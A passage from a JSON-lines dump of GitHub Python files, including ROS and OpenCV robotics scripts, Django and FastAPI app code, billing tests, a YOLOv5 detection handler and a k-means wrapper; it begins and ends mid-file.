(1 - alpha) * z + 1e-7) + cy\n xy = torch.stack([x, y], dim=1)\n\n return xy, z\n\n def get_origin(self, flatten=False):\n \"\"\"Get the origin of the camera in world coordinates\"\"\"\n orig = self.Tcw.T[:, :3, -1].view(len(self), 3, 1, 1).repeat(1, 1, *self.hw)\n if flatten:\n orig = orig.reshape(len(self), 3, -1).permute(0, 2, 1)\n return orig\n\n def get_viewdirs(self, normalize=None, to_world=None, flatten=False, reflect=False, grid=None):\n \"\"\"Get the view directions of the camera in world coordinates\"\"\"\n ones = torch.ones((len(self), 1, *self.hw), dtype=self.dtype, device=self.device)\n rays = self.reconstruct_depth_map(ones, to_world=False, grid=grid)\n\n if reflect:\n rays[:, 1] = - rays[:, 1]\n rays[:, 2] = - rays[:, 2]\n\n if normalize is True or normalize == 'unit':\n rays = rays / torch.norm(rays, dim=1).unsqueeze(1)\n if normalize == 'plane':\n rays = rays / torch.norm(rays, dim=1).unsqueeze(1)\n rays = rays / rays[:, [2]]\n\n if to_world:\n # rays = self.to_world(rays).reshape(len(self), 3, *self.hw)\n rays = self.no_translation().to_world(rays).reshape(len(self), 3, *self.hw)\n\n if flatten:\n rays = rays.reshape(len(self), 3, -1).permute(0, 2, 1)\n\n return rays\n\n def offset_start(self, start):\n \"\"\"Offset the camera by a given amount\"\"\"\n new_cam = self.clone()\n if is_seq(start):\n new_cam.K[:, 2] -= start[1]\n new_cam.K[:, 3] -= start[0]\n else:\n start = start.to(self.device)\n new_cam.K[:, 2] -= start[:, 1]\n new_cam.K[:, 3] -= start[:, 0]\n return new_cam\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/geometry/cameras/ucm.py","file_name":"ucm.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"3549899525","text":"number = int(input())\nfactorization = []\n\nwhile number != 1:\n for i in range(2,number+1):\n if number%i == 0:\n factorization.append(i)\n number = number//i\n break\n\nfor f in factorization:\n print(f)","repo_name":"minjikang-cod/baekjoon","sub_path":"11653_소인수분해.py","file_name":"11653_소인수분해.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5885919823","text":"#!/usr/bin/env python\nimport os\nimport copy\nimport math\nimport xmlrpclib\nimport numpy as np\n\nimport rospy\nimport roslib\nimport tf\nfrom geometry_msgs.msg import PoseStamped\nfrom arl_hw_msgs.msg import MusculatureState\nfrom arl_hand_tracker_msgs.msg import TrainingData\n\n\nclass Publisher:\n def __init__(self, name):\n rospy.init_node(name, anonymous=True)\n self._name = name\n self._ros_master = xmlrpclib.ServerProxy(os.environ['ROS_MASTER_URI'])\n\n rospy.Subscriber('/musculature/state', MusculatureState, self._state_cb)\n self._last_musculature_state = MusculatureState()\n\n self._hand_pose_publisher = rospy.Publisher('/hand_pose', PoseStamped, queue_size=10)\n self._training_data_publisher = rospy.Publisher('/training/state_data', TrainingData, queue_size=10)\n\n self._tf_listener = None\n self._tf_broadcaster = tf.TransformBroadcaster()\n\n def _state_cb(self, data):\n self._last_musculature_state = data\n\n def run(self):\n self._tf_listener = tf.TransformListener()\n\n rate = rospy.Rate(100)\n static_pose = None\n\n while not rospy.is_shutdown():\n\n # get reference transform once\n if static_pose is None:\n (static_pose, success) = self._get_transform('/camera_depth_frame', '/red_marker_frame')\n if not success:\n static_pose = None\n else:\n self._tf_broadcaster.sendTransform((static_pose.pose.position.x, static_pose.pose.position.y,\n static_pose.pose.position.z), (static_pose.pose.orientation.x,\n static_pose.pose.orientation.y,\n static_pose.pose.orientation.z,\n static_pose.pose.orientation.w),\n rospy.Time.now(), '/base_link', '/camera_depth_frame')\n\n # publish training data\n data = TrainingData()\n data.header.stamp = rospy.get_rostime()\n data.header.frame_id = '0'\n data.musculature_state = self._last_musculature_state\n\n (pose_msg, success) = self._get_transform('/base_link', '/yellow_marker_frame')\n if success:\n self._hand_pose_publisher.publish(pose_msg)\n data.hand_pose = pose_msg\n self._training_data_publisher.publish(data)\n\n (pose_msg, success) = self._get_transform('/base_link', '/blue_marker_frame')\n if success:\n data.elbow_pose = pose_msg\n self._training_data_publisher.publish(data)\n\n (pose_msg, success) = self._get_transform('/base_link', '/green_marker_frame')\n if success:\n data.shoulder_pose = pose_msg\n self._training_data_publisher.publish(data)\n\n rate.sleep()\n\n def _get_transform(self, source, destination):\n pose_msg = PoseStamped()\n success = False\n try:\n (trans, quat) = self._tf_listener.lookupTransform(source, destination, rospy.Time(0))\n pose_msg.header.stamp = rospy.get_rostime()\n pose_msg.header.frame_id = '0'\n pose_msg.pose.position.x = trans[0]\n pose_msg.pose.position.y = trans[1]\n pose_msg.pose.position.z = trans[2]\n pose_msg.pose.orientation.x = quat[0]\n pose_msg.pose.orientation.y = quat[1]\n pose_msg.pose.orientation.z = quat[2]\n pose_msg.pose.orientation.w = quat[3]\n success = True\n\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n pass\n\n return pose_msg, success\n\n\nif __name__ == '__main__':\n try:\n publisher = Publisher('hand_position_publisher_node')\n publisher.run()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"arne48/arl_hand_tracker","sub_path":"arl_hand_tracker/src/hand_position_publisher_node.py","file_name":"hand_position_publisher_node.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18668807715","text":"import cv2\nimport numpy as np\n \nx = 0 # variable to store the x-coordinate of the object\nset_point = 300 # variable to store set_point\ntotalError=0\nkp=1\nki=0\nkd=0\n \ncap = cv2.VideoCapture(0)\n # setup detector and paramaters\nparams = cv2.SimpleBlobDetector_Params()\n \nparams.filterByColor = False\nparams.filterByArea = False # set it to True to use minArea & maxArea\nparams.minArea = 500 # choose suitable values of minArea & maxArea \nparams.maxArea = 2000\nparams.filterByInertia = False\nparams.filterByConvexity = False\nparams.filterByCircularity = True\nparams.minCircularity =0.5\nparams.maxCircularity =1\n \ndet = cv2.SimpleBlobDetector_create(params)\n \nlower_red = np.array([149,169,143])\nupper_red = np.array([179,255,255])\n \nwhile True:\n ret,frame = cap.read()\n imgHSV = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n redMask = cv2.inRange(imgHSV,lower_red,upper_red)\n blur= cv2.blur(redMask,(10,10))\n \n res = cv2.bitwise_and(frame,frame, mask=redMask)\n # get and draw keypoint\n keypnts= det.detect(blur)\n cv2.drawKeypoints(frame,keypnts,frame,(0,255,0),cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n cv2.imshow('frame',frame)\n #cv2.imshow('mask',blur)\n \n for k in keypnts:\n x = (int (k.pt[0]))\n #print(x)\n z= x-set_point\n \n if z>=-20 and z<=20: # condition to set the marging of error at zero plus or minus 2\n error = 0\n previousError = error\n totalError = totalError + error\n \n else:\n error = z \n previousError = error\n totalError = totalError + error\n \n power = int(kp*error + kd*(error-previousError) + ki*totalError)\n print(power)\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n \ncap.release()\ncv2.destroyAllWindows\n ","repo_name":"mathengejob/robotics","sub_path":"Archives/Locate Red objects.py","file_name":"Locate Red objects.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73455158808","text":"import os\nfrom django.utils.log import DEFAULT_LOGGING\n\nSECRET_KEY = os.environ.get('SECRET_KEY')\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nAPPEND_SLASH = True\n\nREQUIRED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django_filters',\n 'rest_framework',\n]\n\nPROJECT_APPS = [\n 'apps.article',\n]\n\nINSTALLED_APPS = REQUIRED_APPS + PROJECT_APPS\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'core.urls'\n\nWSGI_APPLICATION = 'core.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': os.environ.get('DB_NAME'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT'),\n 'TEST': {\n 'NAME': os.environ.get('DB_TEST'),\n },\n },\n}\n\nPASSWORD_HASHERS = [\n 'django.contrib.auth.hashers.Argon2PasswordHasher',\n]\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates'),\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': TEMPLATE_DIRS,\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n 'PAGE_SIZE': 15,\n 'NON_FIELD_ERRORS_KEY': 'detail',\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_FILTER_BACKENDS': (\n 'django_filters.rest_framework.DjangoFilterBackend',\n 'rest_framework.filters.SearchFilter',\n 'rest_framework.filters.OrderingFilter',\n ),\n}\n\n# TIME_ZONE = env.TIME_ZONE\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\nTIME_ZONE = 'Asia/Ho_Chi_Minh'\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/public/static/'\nMEDIA_URL = '/public/media/'\n# User defined constants\n\nERROR_CODES = {\n 'OK': 200,\n 'BAD_REQUEST': 400,\n 'UNAUTHORIZED': 401,\n 'FORBIDDEN': 403,\n 'NOT_FOUND': 404,\n 'METHOD_NOT_ALLOWED': 405,\n 'INTERNAL_SERVER_ERROR': 500,\n}\n\nLOGGING = DEFAULT_LOGGING\n\n\nLOGGING['loggers']['django'] = {\n 'handlers': ['console', ],\n 'level': 'INFO',\n}\n","repo_name":"tbson/demo_django_filter","sub_path":"api/core/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23844920","text":"from fastapi import FastAPI, HTTPException, status\nfrom fastapi.responses import JSONResponse\nfrom fastapi.encoders import jsonable_encoder\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom backend import database, model\n\n\napp = FastAPI()\n\norigins = ['http://localhost:3000']\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=['*'],\n allow_headers=['*']\n)\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/api/todo\", response_model=list[model.Todo])\nasync def get_todo():\n response = await database.fetch_all_todos()\n return response\n\n\n@app.get(\"/api/todo/{title}\", response_model=model.Todo)\nasync def get_todo_by_id(title: str):\n response = await database.fetch_one_todo(title)\n if response:\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f'there is no item with title: {title}'\n )\n\n\n@app.post(\"/api/todo\", response_model=model.Todo, status_code=status.HTTP_201_CREATED)\nasync def post_todo(todo: model.Todo):\n response = await database.create_todo(todo.dict())\n if response:\n # for some reason, return response would not work\n return todo.dict()\n else:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail='Something went wrong, bad request'\n )\n\n\n@app.put(\"/api/todo/{title}\", response_model=model.Todo)\nasync def put_todo(title: str, description: str):\n response = await database.update_todo(title, description)\n if response:\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f'there is no item with title: {title}'\n )\n\n\n@app.delete(\"/api/todo/{title}\")\nasync def delete_todo(title: str):\n response = await database.delete_todo(title)\n if response:\n return \"Success deleted Todo Item\"\n else:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f'there is no item with title: {title}'\n )\n ","repo_name":"nickrosh/farm_list","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13819517901","text":"import sys\nfrom quadro import Quadro\nfrom subcamada import Subcamada\n\nclass Aplicacao(Subcamada):\n \n def __init__(self):\n Subcamada.__init__(self, sys.stdin)\n self.idsessao = 0 #idsessao\n self.sequencia = 0 \n self.debug = False\n \n def recebe(self, dados:Quadro):\n # mostra na tela os dados recebidos da subcamada inferior\n print('Recebido:', dados.data)\n\n def handle(self):\n # lê uma linha do teclado\n \n dados = sys.stdin.readline()\n # chamada do STOP da sessao...\n if dados == \"##stop\":\n self.STOP() \n \n self.sequencia = not self.sequencia\n quadro = Quadro(tiposessao = 0,msgarq = 0,idsessao = self.idsessao,sequencia = self.sequencia,data = dados) \n #\n # self.idsessao = self.idsessao + 1\n # envia os dados para a subcamada inferior (self.lower)\n print(\"Enviando:\", quadro.data)\n self.lower.envia(quadro)\n\n def START(self, idSessao):\n # se for o master inicia uma conexao\n self.idsessao = idSessao\n start = Quadro(tiposessao = 1,sequencia = 0,\n idsessao = self.idsessao,\n data=\"start\")\n if self.debug:\n print('[SESSÃO]: iniciando sessão com id =', start.idSessao)\n self.lower.envia(start)\n #self.sequencia = 1\n\n def STOP(self):\n stop = Quadro(tiposessao = 1,sequencia = 0,\n idsessao = self.idsessao,\n data=\"stop\")\n if self.debug:\n print('[SESSÃO]: STOP sessão com id =', stop.idSessao)\n self.lower.envia(stop)","repo_name":"victorcesc/Python-PPProtocol","sub_path":"adp.py","file_name":"adp.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5573446726","text":"from decimal import Decimal\nfrom requests.auth import _basic_auth_str\n\nfrom misc import add_user, get_or_create\nfrom models.accounts import Merchant, Staff\nfrom models.wallets import Wallet, Currency, ConversionRate\nfrom models.transactions import Invoice, Transaction, Attempt\nfrom models.choices import InvoiceStatus\nfrom services import calculate_rates, AttemptManager, InvoiceManager\n\n\ndef basic_auth(model, test_name: str):\n user = add_user(model, test_name, test_name)\n return user, {'Authorization': _basic_auth_str(test_name, test_name)}\n\n\ndef test_app_session(session, client):\n user, auth = basic_auth(Merchant, 'test_app_session')\n\n response = client.get('/')\n assert response.status_code == 401\n\n response = client.get('/', headers=auth)\n assert response.status_code == 200\n\n response = client.get('/currencies')\n assert response.status_code == 200\n assert response.json() == {'currencies': [\n c.dict() for c in session.query(Currency).all()\n ]}\n\n response = client.get('/currencies')\n assert response.status_code == 200\n assert response.json() == {'currencies': [\n c.dict() for c in session.query(Currency).all()\n ]}\n\n get_or_create(\n ConversionRate, session=session,\n from_currency_id=1, to_currency_id=2,\n defaults=dict(rate='2.2', allow_reversed=False)\n )\n\n response = client.get('/rates/1')\n assert response.status_code == 200\n rates = response.json().get('rates')\n rates = {int(k): float(v) for k, v in rates.items()}\n calculated_rates = {int(k): float(v) for k, v in calculate_rates(1).items()}\n assert rates == calculated_rates\n\n response = client.get('/wallets')\n assert response.status_code == 401\n\n response = client.get('/wallets', headers=auth)\n assert response.status_code == 200\n assert response.json() == {'data': [], 'itemsCount': 0}\n\n assert 0 == session.query(Wallet).filter(Wallet.merchant_id == user.id).count()\n\n response = client.post('/wallet')\n assert response.status_code == 401\n\n response = client.post('/wallet', json={'currency_id': 1}, headers=auth)\n assert response.status_code == 200\n\n assert 1 == session.query(Wallet).filter(Wallet.merchant_id == user.id).count()\n wallet = session.query(Wallet).filter(Wallet.merchant_id == user.id).one()\n\n response = client.get('/wallets', headers=auth)\n assert response.status_code == 200\n assert response.json() == {'data': [{\n 'id': wallet.id, 'amount': 0.0, 'currency_id': 1, 'merchant_id': user.id\n }], 'itemsCount': 1}\n\n response = client.get('/invoices')\n assert response.status_code == 401\n\n response = client.get('/invoices', headers=auth)\n assert response.status_code == 200\n assert response.json() == {'data': [], 'itemsCount': 0}\n\n response = client.post('/invoice')\n assert response.status_code == 401\n\n response = client.post('/invoice', json={\n 'to_wallet_id': wallet.id,\n 'amount': 22.2\n }, headers=auth)\n assert response.status_code == 200\n inv_token = response.json()['token']\n\n assert 1 == session.query(Invoice).filter(Invoice.to_wallet_id == wallet.id).count()\n invoice = session.query(Invoice).filter(Invoice.to_wallet_id == wallet.id).one()\n\n url = f'/pay/{inv_token}'\n\n response = client.get(url)\n assert response.status_code == 200\n assert response.json() == {\n 'wallet_id': wallet.id,\n 'currency_id': 1,\n 'amount': 22.2,\n 'paid': 0,\n 'unpaid': 22.2\n }\n\n response = client.post(url, json={'amount': '11.1', 'currency_id': 1})\n assert response.status_code == 200\n token = response.json()['token']\n\n url = f'/attempt/{token}'\n\n response = client.get(url)\n assert response.status_code == 200\n assert response.json() == [{'id': 1, 'name': 'test', 'type': 'visa'}]\n\n response = client.post(url, json={'payment_system_id': 1})\n assert response.status_code == 200\n\n attempt = session.query(Attempt)\\\n .filter(Attempt.transaction_id == Transaction.id)\\\n .filter(Transaction.token == token)\\\n .one()\n\n with AttemptManager(attempt.id) as manager:\n manager.success()\n\n with InvoiceManager(invoice.id) as manager:\n manager.fetch()\n assert manager.paid_amount == manager.unpaid_amount == Decimal('11.1')\n\n payer_user, payer_auth = basic_auth(Merchant, 'test_app_session_payer')\n payer_wallet = Wallet(\n merchant_id=payer_user.id,\n currency_id=1,\n amount=Decimal('100')\n )\n session.add(payer_wallet)\n session.commit()\n\n url = f'/pay/{inv_token}'\n response = client.post(\n url, json={'amount': '10.0', 'from_wallet_id': payer_wallet.id},\n headers=payer_auth\n )\n assert response.status_code == 200\n\n with InvoiceManager(invoice.id) as manager:\n manager.fetch()\n assert manager.paid_amount == Decimal('21.1')\n assert manager.invoice.status != InvoiceStatus.complete\n\n url = f'/pay/{inv_token}'\n response = client.post(\n url, json={'amount': '1.1', 'from_wallet_id': payer_wallet.id},\n headers=payer_auth\n )\n assert response.status_code == 200\n\n with InvoiceManager(invoice.id) as manager:\n manager.fetch()\n assert manager.paid_amount == Decimal('22.2')\n assert manager.invoice.status == InvoiceStatus.complete\n\n staff, staff_auth = basic_auth(Staff, 'test_app_session_staff')\n url = f'/refund/{token}'\n\n response = client.post(url)\n assert response.status_code == 200\n status = response.json()['status']\n\n assert status == session.query(Transaction.status)\\\n .filter(Transaction.token == token)\\\n .scalar()\n\n with InvoiceManager(invoice.id) as manager:\n manager.fetch()\n assert manager.paid_amount == Decimal('11.1')\n assert manager.invoice.status == InvoiceStatus.incomplete\n","repo_name":"illia-volkov-completecase/PA","sub_path":"src/billing/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28172152865","text":"import requests\n\nurl = \"https://ispip.clang.cn/all_cn_cidr.txt\"\nr = requests.get(url).text\n\nlines = r.splitlines()\n\noutput = \"/log info \\\"Loading CN address list\\\"\\n/ip route remove [find comment=\\\"CN\\\"]\\n/ip route\\n\"\n\nfor line in lines:\n # address = line.split(\" \")[1]\n address = line\n output += \":do { add dst-address=\" + address + \" gateway=192.168.50.1 distance=10 comment=\\\"CN\\\" } on-error={}\\n\"\n\nwith open('CN_route', 'w') as file:\n file.write(output)\n\nwith open('CN_route_backup', 'w') as file:\n file.write(output.replace('CN', 'CN_backup').replace('distance=10', 'distance=20'))\n","repo_name":"mike-BV/CN_mikrotik","sub_path":"CN_Gen2.py","file_name":"CN_Gen2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29904405095","text":"import os\nimport cv2\nimport pafy # pip install youtube-dl==2020.12.2\nimport torch\nimport time\n\n\nfrom pathlib import Path\n\nclass Input_handler:\n \"\"\" Class for supplying and manipulating input data \"\"\" \n\n def __init__(self, videoSource, modelSource, forceReload_flag, captureDetection, captureFrequency, detectionThreshold):\n \"\"\"\n Initializing the input data stream\n\n :param videoSource: URL/Path to videoSource\n :param modelSource: URL/Path to modelSource\n :param forceReload_flag: Boolean if program will force reload PyTorch cache\n :param captureDetection: Boolean if program will save detections as an image.\n :param captureFrequency: Integer interval between saved pictures.\n :param detectionThreshold: Float threshold to decide what counts as a detection.\n \"\"\"\n\n # Load flags passed from main\n self.videoSource = videoSource\n self.modelSource = modelSource\n self.forceReload = forceReload_flag\n self.captureDetection = captureDetection\n self.captureFrequency = captureFrequency\n self.detectionThreshold = detectionThreshold\n \n self.model = self.load_model() # Load the model defined in the load_model function\n self.classes = self.model.names # Load the classes defined in the model\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'# Set the device for the model to load on to be the cuda device, otherwise the cpu\n print('[SETUP] Device Used: ',self.device) # Print the Device used for logging purposes\n\n # Set default values\n self.ret = False # Boolean for successfully returned frame\n self.frame = None # Actual frame to be processed and output\n self.detected_flag = False # Set initial value for detection\n\n self.startTime = time.time() # Start time for interval deciding when to save a new picture\n self.savedImageCounter = 0 # Incremental counter which is appended to saved images' filename\n self.path = Path.cwd() / 'resources/SavedDetections'\n print('[SETUP] Saved RAW images will be saved to: ', self.path)\n\n # Process and set the videoSource\n self.processed_videoSource = self.processInputPath(videoSource)\n\n\n def load_model(self):\n \"\"\" Function to load the YOLOv5 model from the pyTorch GitHub when not implemented locally \"\"\" \n model = torch.hub.load('ultralytics/yolov5',\n 'custom',\n path=self.modelSource,\n force_reload=self.forceReload)\n return model\n \n\n def predict_with_model(self, frame):\n \"\"\"\n Function to score a frame with the model\n\n :param frame:\n :return: labels, coordinates\n \"\"\"\n self.model.to(self.device) # Send the model to the device\n\n frame = [frame] # Assign the frame\n prediction = self.model(frame) # Score the frame on the model\n \n labels, coordinates = prediction.xyxyn[0][:, -1], prediction.xyxyn[0][:, :-1] # Grab the labels and coordinates from the results\n return labels, coordinates\n\n\n def label_toString(self, x):\n \"\"\" Function to return the label of in which to assign to a score \"\"\" \n return self.classes[int(x)]\n\n\n def plot_frame(self, prediction, frame, rawFrame):\n \"\"\"\n Function to plot boxes, labels and confidence values around detections on the frame\n\n :param prediction: labels and coordinates\n :param frame: current image as an array\n :param rawFrame: a copy of the current image as an array\n :return: frame, detection_flag, detectionCount, lowestConfidence, highestConfidence\n \"\"\"\n\n global detection_flag\n global detectionCount\n detection_flag = False\n detectionCount = 0\n highestConfidence = None\n lowestConfidence = None\n\n background_color = (0, 0, 255) # Color of the box\n text_color = (255, 255, 255) # Color of the \n \n labels, coordinates = prediction # Grab the labels and coordinates from the results \n labelLength = len(labels) # Grab the length of the labels\n x_shape, y_shape = frame.shape[1], frame.shape[0] # Pass the shape of the box to be plot\n\n for i in range(labelLength): # For each label detected, plot the bounding box, label and confidence value\n row = coordinates[i] # Grab the prediction to plot\n confidenceValue = row[4] # Grab the confidence value from the tuple\n\n if lowestConfidence is None or confidenceValue <= lowestConfidence: # Get lowest confidence value from the image\n lowestConfidence = confidenceValue\n\n if highestConfidence is None or confidenceValue >= highestConfidence: # Get highest confidence value from the image\n highestConfidence = confidenceValue\n\n if confidenceValue >= self.detectionThreshold: # If confidence interval is greater than confidenceThreshold do:\n detection_flag = True\n detectionCount = labelLength\n\n if self.captureDetection:\n self.save_raw_image(rawFrame) # If enabled, save picture on detection\n\n x1, y1, x2, y2 = int(row[0]*x_shape), int(row[1]*y_shape), int(row[2]*x_shape), int(row[3]*y_shape) # Get the coordinates of the box to be plot\n \n \n cv2.rectangle(frame,(x1, y1), (x2, y2), background_color, 2) # Plot bounding box\n \n w, h = 110, 15\n cv2.rectangle(frame, (x1, y1), (x1 + w, y1 - h),background_color,-1) # Plot background box for label\n \n\n cv2.putText(frame, # Plot the label text\n self.label_toString(labels[i]).upper()+' '+str(\"%.2f\" % confidenceValue.item()), \n (x1, y1-3), \n cv2.FONT_HERSHEY_SIMPLEX, 0.45, text_color, 1)\n\n return frame, detection_flag, detectionCount, lowestConfidence, highestConfidence\n\n\n \n def read_current_frame(self):\n \"\"\"\n Function get a single frame from the video source\n\n :return: ret, frame, rawFrame\n \"\"\"\n ret, frame = self.processed_videoSource.read() # Get boolean return and frame from the video feed\n try:\n rawFrame = frame.copy() # Try to copy the frame\n except Exception:\n rawFrame = frame\n \n return ret, frame, rawFrame\n\n\n def processInputPath(self, videoSource):\n \"\"\" Function to process the string path/url video input and assign as a cv2 video object\n\n :return: processedSource\n \"\"\"\n\n try: \n processedSource = cv2.VideoCapture(int(videoSource)) # Try to check if input is a camera\n print('[SETUP] Input source is identified as a local camera ... ')\n return processedSource\n except Exception:\n if \"youtube\" in videoSource or \"youtu.be\" in videoSource: # If the video source path contains fragments of youtube video URL's, handle them as such\n print('[SETUP] URL supplied is a YouTube-link, processing ... ') # Since cv2 won't capture video from a YouTube URL as-is.\n ytLink = pafy.new(videoSource).streams[-1]\n assert ytLink is not None\n processedSource = cv2.VideoCapture(ytLink.url)\n return processedSource\n else:\n processedSource = cv2.VideoCapture(videoSource) # Otherwise assign it\n return processedSource\n\n \n \n\n\n def save_raw_image(self, rawFrame, imgLabel=None):\n \"\"\" Function to save an image from the frame\n\n :param rawFrame: A raw copy without plots of the current frame\n \"\"\"\n global savedImageCounter\n global startTime\n capture_interval = 60-self.captureFrequency # User defined interval at which is the minimum time between pictures\n \n if not imgLabel:\n current_time = time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\n imgLabel = f'detection-{current_time}_{self.savedImageCounter}.png' #.jpg # Name the saved file by by date and image counter to avoid duplicates\n secondIterator = (60.0 - (time.time() - self.startTime) % 60.0) \n\n if secondIterator <= capture_interval: # Print image if detection and int(interval) seconds has passed\n cv2.imwrite(os.path.join(self.path, imgLabel), rawFrame) # Save the image to disk\n self.savedImageCounter += 1 # Increment the counter\n self.startTime = time.time() # Reset the start time for a new interval\n\n def resize_frame(self, frame, output_dim):\n \"\"\" Function to resize the frame\n\n :param frame : Current frame\n :param output_dim : Dimensions specified for resized frame\n :return: resized_frame\n \"\"\"\n try:\n resized_frame = cv2.resize(frame, output_dim)\n except Exception:\n pass\n return resized_frame\n\n def release(self):\n \"\"\" Function to manually release the resource \"\"\"\n self.processed_videoSource.release()\n\n def __del__(self):\n \"\"\" Function to release the resource \"\"\"\n self.processed_videoSource.release()\n \n","repo_name":"jwlei/real-time-object-detection-YOLOv5-cv2","sub_path":"Realtime-dwls/input_/input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15351464747","text":"import math\nimport numpy as np\nimport pandas as pd\nimport sys\nimport mykmeanssp as kmeans\n\nDEFAULT_MAX_ITER = 300\n\n\n\ndef main(bonus_run=False, k=1, vectors=None):\n k, max_iter, eps, vectors = get_input_bonus_wrap(bonus_run, k, vectors)\n centroids = init_centroids(vectors, k)\n\n list_of_centroids = get_python_list(centroids)\n list_of_vectors = get_python_list(vectors)\n result_centroids = kmeans.fit(k, max_iter, len(list_of_vectors), len(list_of_vectors[0]), eps, list_of_vectors, list_of_centroids)\n if not bonus_run:\n print_selected_indices(centroids)\n print_centroids(result_centroids)\n print()\n else:\n return result_centroids\n\n\ndef print_selected_indices(centeroids: pd.DataFrame):\n index_list = list(map(str, centeroids.index))\n print(\",\".join(index_list))\n\n\ndef print_centroids(centroids: list):\n for centroid in centroids:\n str_list = list(map(str, centroid))\n str_list = [\"%.4f\" % float(x) for x in str_list]\n print(\",\".join(str_list))\n\n\ndef get_input_bonus_wrap(bonus_run, k, vectors):\n if not bonus_run:\n k, max_iter, eps, vectors = get_input()\n else:\n max_iter, eps, vectors = 1000, 0.0, pd.DataFrame(vectors)\n return k, max_iter, eps, vectors\n\n\ndef get_input():\n if len(sys.argv) == 5:\n k, max_iter, eps, file_path1, file_path2 = sys.argv[1], DEFAULT_MAX_ITER, sys.argv[2], sys.argv[3], sys.argv[4]\n else:\n k, max_iter, eps, file_path1, file_path2 = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5]\n try:\n k = int(k)\n except Exception as e:\n print(\"Invalid number of clusters!\")\n sys.exit(1)\n try:\n max_iter = int(max_iter)\n except Exception as e:\n print(\"Invalid maximum iteration!\")\n sys.exit(1)\n try:\n eps = float(eps)\n except Exception as e:\n print(\"Invalid eps!\")\n sys.exit(1)\n assert 1 < max_iter < 1000, \"Invalid maximum iteration!\"\n vectors1 = pd.read_csv(file_path1, header=None)\n vectors2 = pd.read_csv(file_path2, header=None)\n num_columns1 = len(vectors1.columns)\n num_columns2 = len(vectors2.columns)\n column_names1 = [f'column{i + 1}' for i in range(num_columns1)]\n column_names2 = [f'column{i + 1}' for i in range(num_columns2)]\n vectors1.columns = 